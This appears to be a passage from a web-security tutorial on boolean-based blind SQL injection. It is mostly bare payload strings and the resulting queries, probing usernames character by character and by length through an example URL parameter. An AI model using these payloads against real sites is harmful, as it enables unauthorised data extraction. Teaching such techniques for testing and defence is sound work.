In our Previous tutorial we learnt about SQL Injection characters and different exploitation techniques to exploit SQL Injection Vulnerability. From today we will start learning all exploitation techniques in details with help of examples starting from Boolean Exploitation Technique.
Boolean Exploitation Technique |
http://www.example.com/index.php?id=1’
SELECT Field1, Field2, Field3 FROM Users WHERE Id=’$Id’
$Id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1
http://www.example.com/index.php?id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1
SELECT Field1, Field2, Field3 FROM Users WHERE Id=’1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1’
$Id=1’ AND ‘1’ = ‘2
SELECT Field1, Field2, Field3 FROM Users WHERE Id=’1’ AND ‘1’ = ‘2’
http://www.example.com/index.php?id=1’ AND ‘1’ = ‘2
$Id=1′ AND LENGTH(username)=N AND ‘1’ = ‘1
SELECT Field1, Field2, Field3 FROM Users WHERE Id=’1′ AND LENGTH(username)=N AND ‘1’ = ‘1’
http://www.example.com/index.php?id=1′ AND LENGTH(username)=N AND ‘1’ = ‘1